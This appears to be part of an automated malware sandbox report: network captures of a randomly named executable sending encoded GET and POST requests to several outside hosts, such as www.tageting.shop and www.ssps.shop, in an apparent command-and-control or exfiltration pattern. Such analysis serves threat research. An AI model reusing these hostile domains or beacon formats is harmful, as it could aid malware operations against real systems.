                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 f3 c9 cc cb 56 c8 2c 56 48 ad 28 c8 2c 4a 4d 01 00 e1 b0 96 c8 0f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 23V,VH(,JM0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.849725173.0.157.187806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:29.682641983 CET448OUTGET /5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.0be.info
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:28:31.005750895 CET217INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Tue, 26 Nov 2024 08:28:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Cache-Control: no-cache, private
                                                                                Data Raw: 66 0d 0a 4c 69 6e 6b 20 69 73 20 65 78 70 69 72 65 64 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: fLink is expired0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.84972613.227.8.45806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:37.174638033 CET710OUTPOST /x43r/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.tageting.shop
                                                                                Referer: http://www.tageting.shop/x43r/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 74 30 65 62 73 77 78 54 6b 76 49 51 56 65 69 7a 6a 77 43 75 34 70 4c 39 6d 6c 50 7a 4e 65 54 4d 4a 30 5a 39 61 78 64 78 5a 56 76 4c 36 7a 48 66 4e 70 57 6a 6b 74 38 6e 71 43 47 49 6e 66 37 31 53 7a 57 67 57 7a 63 74 38 4e 69 50 7a 31 50 34 6a 6d 38 65 6a 44 56 39 7a 38 72 71 69 62 50 6a 72 76 4f 6f 42 44 35 6d 65 55 35 78 6b 70 48 74 31 38 53 4a 4b 4e 67 55 69 48 32 41 36 73 39 39 6a 68 78 38 36 74 45 53 69 62 41 2b 55 62 38 79 55 4d 45 2b 73 78 39 41 35 33 53 52 4a 31 43 6a 32 4b 6a 45 64 6b 37 45 4e 41 47 36 56 2b 63 51 2b 79 50 48 71 4d 72 54 55 4e 70 7a 77 65 51 76 4d 56 47 53 43 44 51 3d
                                                                                Data Ascii: ynlT=t0ebswxTkvIQVeizjwCu4pL9mlPzNeTMJ0Z9axdxZVvL6zHfNpWjkt8nqCGInf71SzWgWzct8NiPz1P4jm8ejDV9z8rqibPjrvOoBD5meU5xkpHt18SJKNgUiH2A6s99jhx86tESibA+Ub8yUME+sx9A53SRJ1Cj2KjEdk7ENAG6V+cQ+yPHqMrTUNpzweQvMVGSCDQ=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.84972713.227.8.45806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:40.097840071 CET730OUTPOST /x43r/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.tageting.shop
                                                                                Referer: http://www.tageting.shop/x43r/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 74 30 65 62 73 77 78 54 6b 76 49 51 55 36 65 7a 6b 58 2b 75 2b 4a 4b 50 36 31 50 7a 55 4f 53 46 4a 30 64 39 61 30 35 68 61 6a 66 4c 37 53 33 66 4d 73 69 6a 6c 74 38 6e 69 69 47 4e 36 50 37 71 53 7a 62 54 57 78 49 74 38 4e 6d 50 7a 30 2f 34 6a 31 55 64 68 54 56 6a 2f 63 72 6f 76 37 50 6a 72 76 4f 6f 42 46 55 78 65 56 52 78 6e 61 66 74 6e 74 53 4b 55 64 67 58 6c 48 32 41 73 63 39 35 6a 68 78 65 36 73 6f 30 69 5a 34 2b 55 61 4d 79 55 64 45 39 6d 78 39 43 32 58 54 64 49 48 48 73 30 72 66 32 64 69 7a 52 53 47 44 46 5a 6f 74 36 6b 51 48 42 70 4d 44 34 55 4f 42 46 31 70 4e 48 57 32 57 69 63 55 47 2f 75 59 5a 49 65 30 44 73 31 62 43 4e 54 67 47 77 37 74 57 47
                                                                                Data Ascii: ynlT=t0ebswxTkvIQU6ezkX+u+JKP61PzUOSFJ0d9a05hajfL7S3fMsijlt8niiGN6P7qSzbTWxIt8NmPz0/4j1UdhTVj/crov7PjrvOoBFUxeVRxnaftntSKUdgXlH2Asc95jhxe6so0iZ4+UaMyUdE9mx9C2XTdIHHs0rf2dizRSGDFZot6kQHBpMD4UOBF1pNHW2WicUG/uYZIe0Ds1bCNTgGw7tWG


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.84972813.227.8.45806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:42.767025948 CET1747OUTPOST /x43r/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.tageting.shop
                                                                                Referer: http://www.tageting.shop/x43r/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 74 30 65 62 73 77 78 54 6b 76 49 51 55 36 65 7a 6b 58 2b 75 2b 4a 4b 50 36 31 50 7a 55 4f 53 46 4a 30 64 39 61 30 35 68 61 67 2f 4c 37 67 2f 66 4e 50 36 6a 2f 74 38 6e 73 43 47 4d 36 50 36 77 53 7a 43 37 57 78 55 39 38 50 75 50 38 32 33 34 7a 55 55 64 37 44 56 6a 69 4d 72 74 69 62 50 32 72 72 71 73 42 46 6b 78 65 56 52 78 6e 62 76 74 6b 38 53 4b 57 64 67 55 69 48 32 45 36 73 38 6b 6a 68 49 38 36 73 63 43 69 70 59 2b 55 36 63 79 62 50 63 39 71 78 39 63 36 33 53 41 49 47 36 73 30 6f 72 36 64 69 76 37 53 42 50 46 63 70 30 33 33 52 33 63 38 71 48 52 56 4d 46 75 35 4c 46 4b 58 46 43 4d 58 30 2b 79 6b 39 51 6c 65 6e 58 76 78 61 4b 43 4d 6e 4b 31 71 6f 33 59 69 36 72 5a 79 6b 59 56 33 56 74 4c 49 32 77 56 79 6f 65 5a 6c 54 54 72 67 78 57 6c 36 73 62 31 53 4f 64 4c 4f 79 61 6e 49 6b 2b 36 73 54 56 52 47 6d 41 63 52 61 6d 41 57 33 6a 72 4d 78 66 6d 70 6f 36 50 34 57 4a 50 4a 4b 79 31 61 67 55 44 4d 53 6d 4f 36 65 45 38 73 2b 2b 6f 74 4d 31 70 70 4b 39 4a 70 73 31 33 30 5a 4a 35 6b 78 4e 7a 52 [TRUNCATED]
                                                                                Data Ascii: ynlT=t0ebswxTkvIQU6ezkX+u+JKP61PzUOSFJ0d9a05hag/L7g/fNP6j/t8nsCGM6P6wSzC7WxU98PuP8234zUUd7DVjiMrtibP2rrqsBFkxeVRxnbvtk8SKWdgUiH2E6s8kjhI86scCipY+U6cybPc9qx9c63SAIG6s0or6div7SBPFcp033R3c8qHRVMFu5LFKXFCMX0+yk9QlenXvxaKCMnK1qo3Yi6rZykYV3VtLI2wVyoeZlTTrgxWl6sb1SOdLOyanIk+6sTVRGmAcRamAW3jrMxfmpo6P4WJPJKy1agUDMSmO6eE8s++otM1ppK9Jps130ZJ5kxNzRH972xi8j4r3vNhGHa1FBmxdbDBzPrRyi2Rn5Qk2a+TX/cqdjqyxe2ymRAQnIs0tsfTgh1K1HtIzs3se+W9AKOjQC3kg8EWq5SHnrLCYxq9QdrQSJqSFy9kN22Ac42OK5CaWjgh6v599Qj4aRVJbqK2tx7dT8ZyfqWx9jBhfhqsRNM6qijwJ/CWWmv7R9MkP6Z6BMoe1Ag10V7AroTSxInBRsKVtv3gy6cdZ5e7qOedkEaXcALmNL5Tp53Jr05gqZIjYCDprAieH11Os0U+tJ5vs/RwKcDU8/r4hcUlNxRC7W3q0RHQ9ILp/cEm8UGuyccSQ+51LyIoTFZR3gWoiyUv9U6ueQhVWUYWFYWv9dZHImnXOBZ8Q4i8gWV0lFwpP0466Ls+AjEFeEn6W813eEXx79ZtG+9U0ahFSrJlUWV9iFC8cfkdje20e3Y5N3T6ttX/nNto+XGd3XmO/ZCR4qcK3cFfTikHSVA9fQS7mVMLPwCeCne3pdorUoiec6K5lWLOBBmBaLMAK4JNxDV5fCMs3rHPamiZb473+bCGg2Us+xFy7gO84YaVosX6fXVgFduh1EocHUG9FT6LhxPYKy0sii5A1VfaaoQAZLH4DFyhfeJ+NCid3nyygwW8EM+FIaxKObaSg4SZ/gsZIcH5sjaV3n7Um8BrmqHS [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.84972913.227.8.45806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:28:45.433423042 CET453OUTGET /x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.tageting.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:28:47.196552992 CET1236INHTTP/1.1 200 OK
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 26 Nov 2024 08:28:46 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Server: nginx
                                                                                Vary: Accept-Encoding
                                                                                P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
                                                                                Set-Cookie: IMWEBVSSID=h73o1dqlpkck6i93382v8sso1cirjrmcisn36a7uuhl51imjv3oam837hpdaj2oga84hjoarnq8mn10u4uob4p05ouhm37186gho2i0; path=/; domain=tageting.shop; HttpOnly
                                                                                Set-Cookie: al=KR; expires=Mon, 22-Sep-2025 08:28:46 GMT; Max-Age=25920000; path=/; domain=tageting.shop; HttpOnly
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                X-Cache: Miss from cloudfront
                                                                                Via: 1.1 0d8b4cbedd535224fcd064adb5292d3a.cloudfront.net (CloudFront)
                                                                                X-Amz-Cf-Pop: BAH53-C1
                                                                                X-Amz-Cf-Id: HoLEejbBupKikuSRc9ZKNvZg707zR0KpzsbnjNgwQt-hOCqr156x0g==
                                                                                Data Raw: 37 33 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 32 2e 34 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 66 61 66 61 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 42 34 38 35 39 3b 0a 09 09 09 66 6f 6e 74 2d 73 79 6e 74 68 65 73 69 73 3a 20 6e 6f 6e 65 3b 0a 09 09 09 74 [TRUNCATED]
                                                                                Data Ascii: 731<!DOCTYPE html><html><head><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script><style>body {background:#fafafa;color: #3B4859;font-synthesis: none;text-rendering: optimizeLegibility;-web
                                                                                Nov 26, 2024 09:28:47.196573973 CET1236INData Raw: 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 09 09 09 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 09 09 09 2d 6d 6f 7a 2d 66 6f
                                                                                Data Ascii: kit-font-smoothing: antialiased;-moz-osx-font-smoothing: grayscale;-moz-font-feature-settings: 'liga', 'kern';direction: ltr;line-height: 1.45;font-size:15px;}a {text-decoration: none;}section {font-size
                                                                                Nov 26, 2024 09:28:47.196588039 CET237INData Raw: 61 3e 0a 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 69 66 72 61 6d 65 20 6e 61 6d 65 3d 22 68 69 64 64 65 6e 5f 66 72 61 6d 65 22 20 69 64 3d 22 68 69 64 64 65 6e 5f 66 72 61 6d 65
                                                                                Data Ascii: a></div></div></div></section><iframe name="hidden_frame" id="hidden_frame" title="hidden frame" src="about:blank" style="position: absolute; left: -9999px; width: 1px; height: 1px; top:-9999px;"></iframe></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.84973013.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:01.206409931 CET698OUTPOST /r99d/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.ssps.shop
                                                                                Referer: http://www.ssps.shop/r99d/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 31 34 69 46 37 46 33 35 31 56 49 32 76 35 77 41 42 2b 78 48 73 53 38 43 71 73 52 53 54 4f 52 46 47 76 53 51 63 43 49 34 6c 33 66 70 4e 43 72 4a 63 55 76 75 41 78 73 34 55 73 4b 6a 55 34 4e 53 4e 35 34 4a 4a 30 77 51 65 38 30 74 75 4e 4a 44 6b 46 4e 6e 33 70 63 4d 49 78 6d 71 71 54 36 52 31 43 55 33 30 43 6d 4d 77 45 4b 4e 6e 38 42 58 4e 56 75 51 75 4e 42 62 79 33 56 4b 4a 4a 35 4b 55 76 4c 45 79 65 37 77 39 6c 64 2f 4c 69 2f 62 70 34 36 43 50 4e 4a 73 42 57 64 34 4d 4d 36 61 44 4c 37 32 62 5a 61 56 42 76 38 30 36 55 7a 72 56 36 72 63 56 42 45 64 4d 76 4d 3d
                                                                                Data Ascii: ynlT=puifggN9xZ4A14iF7F351VI2v5wAB+xHsS8CqsRSTORFGvSQcCI4l3fpNCrJcUvuAxs4UsKjU4NSN54JJ0wQe80tuNJDkFNn3pcMIxmqqT6R1CU30CmMwEKNn8BXNVuQuNBby3VKJJ5KUvLEye7w9ld/Li/bp46CPNJsBWd4MM6aDL72bZaVBv806UzrV6rcVBEdMvM=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.84973113.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:03.925929070 CET718OUTPOST /r99d/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.ssps.shop
                                                                                Referer: http://www.ssps.shop/r99d/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 6e 4a 53 46 72 56 4c 35 39 56 49 31 71 35 77 41 49 65 78 44 73 53 77 43 71 70 31 38 51 34 70 46 42 4f 69 51 64 48 30 34 6b 33 66 70 56 53 72 49 59 55 75 73 41 78 77 76 55 75 65 6a 55 37 78 53 4e 39 6f 4a 4a 48 49 54 63 73 30 76 37 64 4a 42 35 56 4e 6e 33 70 63 4d 49 79 61 51 71 54 79 52 30 79 6b 33 31 6a 6d 4c 75 30 4b 4d 33 73 42 58 63 46 75 55 75 4e 42 74 79 7a 4e 77 4a 4d 39 4b 55 72 50 45 79 4c 50 33 7a 56 63 30 46 43 2f 51 76 71 66 79 42 76 6c 66 64 67 46 65 45 75 71 45 4c 64 4b 63 42 37 53 54 43 76 55 66 36 58 62 64 51 4e 32 30 50 69 55 74 53 34 59 4e 51 53 2b 54 57 4e 37 58 46 48 4d 67 49 53 79 5a 4a 63 65 58
                                                                                Data Ascii: ynlT=puifggN9xZ4AnJSFrVL59VI1q5wAIexDsSwCqp18Q4pFBOiQdH04k3fpVSrIYUusAxwvUuejU7xSN9oJJHITcs0v7dJB5VNn3pcMIyaQqTyR0yk31jmLu0KM3sBXcFuUuNBtyzNwJM9KUrPEyLP3zVc0FC/QvqfyBvlfdgFeEuqELdKcB7STCvUf6XbdQN20PiUtS4YNQS+TWN7XFHMgISyZJceX


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.84973213.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:06.592339039 CET1735OUTPOST /r99d/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.ssps.shop
                                                                                Referer: http://www.ssps.shop/r99d/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 70 75 69 66 67 67 4e 39 78 5a 34 41 6e 4a 53 46 72 56 4c 35 39 56 49 31 71 35 77 41 49 65 78 44 73 53 77 43 71 70 31 38 51 34 68 46 42 34 57 51 63 6b 63 34 2b 33 66 70 5a 79 72 46 59 55 75 74 41 78 6f 6a 55 75 43 5a 55 39 39 53 4d 66 67 4a 50 79 6b 54 57 73 30 76 35 64 4a 63 6b 46 4e 79 33 70 73 49 49 78 79 51 71 54 79 52 30 30 6f 33 38 53 6d 4c 73 30 4b 4e 6e 38 42 54 4e 56 75 73 75 4a 73 59 79 7a 59 4e 4a 59 4a 4b 55 4c 66 45 7a 39 6a 33 78 31 63 32 43 43 2b 51 76 71 6a 74 42 76 35 54 64 67 5a 6b 45 73 36 45 49 34 37 66 56 34 36 34 55 39 56 71 31 41 4c 45 63 50 43 4f 4d 79 77 43 59 4b 45 44 61 6b 36 37 5a 39 4c 6a 49 58 70 5a 56 7a 71 50 46 4b 58 30 6f 4b 4d 4f 45 56 70 72 41 65 53 73 2f 7a 33 4f 6f 61 59 72 6a 62 34 50 31 46 51 41 4e 4a 32 6f 4d 31 47 2b 6c 53 48 63 4a 53 69 6d 79 55 49 54 35 44 37 44 44 74 4c 65 59 4e 54 2f 54 46 6e 58 33 73 30 43 2f 52 30 6d 52 55 4b 75 43 4f 31 76 79 6c 4b 42 58 31 51 78 4d 57 6f 41 30 68 70 6b 35 56 37 6c 6f 61 4f 56 41 32 78 36 7a 50 31 64 4c [TRUNCATED]
                                                                                Data Ascii: ynlT=puifggN9xZ4AnJSFrVL59VI1q5wAIexDsSwCqp18Q4hFB4WQckc4+3fpZyrFYUutAxojUuCZU99SMfgJPykTWs0v5dJckFNy3psIIxyQqTyR00o38SmLs0KNn8BTNVusuJsYyzYNJYJKULfEz9j3x1c2CC+QvqjtBv5TdgZkEs6EI47fV464U9Vq1ALEcPCOMywCYKEDak67Z9LjIXpZVzqPFKX0oKMOEVprAeSs/z3OoaYrjb4P1FQANJ2oM1G+lSHcJSimyUIT5D7DDtLeYNT/TFnX3s0C/R0mRUKuCO1vylKBX1QxMWoA0hpk5V7loaOVA2x6zP1dL/RsB2s46G6A+4pdA8NHie/67ZIMWhDGv9OKLLfhb6yN4aqLHlO4bnzhAF0s99KLAhBBkvb/RwyTtHGQKwqemKIzQg53gfTvlAoW/878Pl8CasnPjyHcJh2m4P2Jik1GQlbhr4dTgieRoejHfLbQmdFBmru//aH+/FtyrrTqyUIMCl10ssNXX6heiXhfa1jkMjEkxhCE63YDNa+SEsU2KsFlTtGCL4/aoE/MwPPIDmJxNB/EmgkJvQ+br8P4/Zj1GCZvsPdp05I7kZp/kL5uEeLzCqdJIsqM87x2OOf80xlEQOrDLcSIlEYo0qZWh/bgpPu4//75kpxfEnUHZJm5LRAHtanX9udVQba+aZgMGXxshXogw1TCnfBS+rUlLfkZ0CObDBz5Ek8aB+kL5wIq8OCQQ2F19CKJMbqXa0p0+e/I3U0iWoT4IFz2mXw9luKA9GVmb76qwOrpItDFBk2JhT4jn2wrYgB+PbfL2FXOIIZQX9j60wynv93Xy7hZWkgi+nKIlvU+BmzZMFe+obmurJ9PUfC7VR2ZJjKsB34zzRBuac3KgXT7ZMqsUVxDaeZqTJNsPcp8xGg5kiDWepCMjl9aBXIphxdG7H7Y37HBt2rBRcSFosMnbuItaO2Hy3pUY9gOJhEQM+E7XgISq0Sh17wiPMwzTv9mnfh [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.84973313.248.169.48806504C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 26, 2024 09:29:09.250710011 CET449OUTGET /r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.ssps.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:10.336684942 CET409INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 26 Nov 2024 08:29:10 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 269
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 6e 6c 54 3d 6b 73 4b 2f 6a 55 4d 51 77 6f 45 33 77 34 71 45 2f 47 2f 51 70 6e 63 42 71 59 46 62 45 38 70 6d 6f 6a 74 68 73 66 68 6e 57 4e 4e 62 43 65 69 4c 53 55 67 59 33 68 50 38 57 52 36 6c 51 6b 32 54 48 30 4d 6d 62 73 2b 65 57 39 5a 4e 4b 34 4d 79 4e 6d 34 69 64 75 49 67 37 66 39 6d 68 67 5a 45 34 75 63 32 4f 41 79 6b 6b 55 53 2f 31 68 49 71 78 78 61 59 35 32 37 4e 68 4d 68 52 4c 6d 37 62 74 41 3d 3d 26 42 5a 63 70 3d 46 78 4c 78 73 4e 43 78 33 78 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt"}</script></head></html>


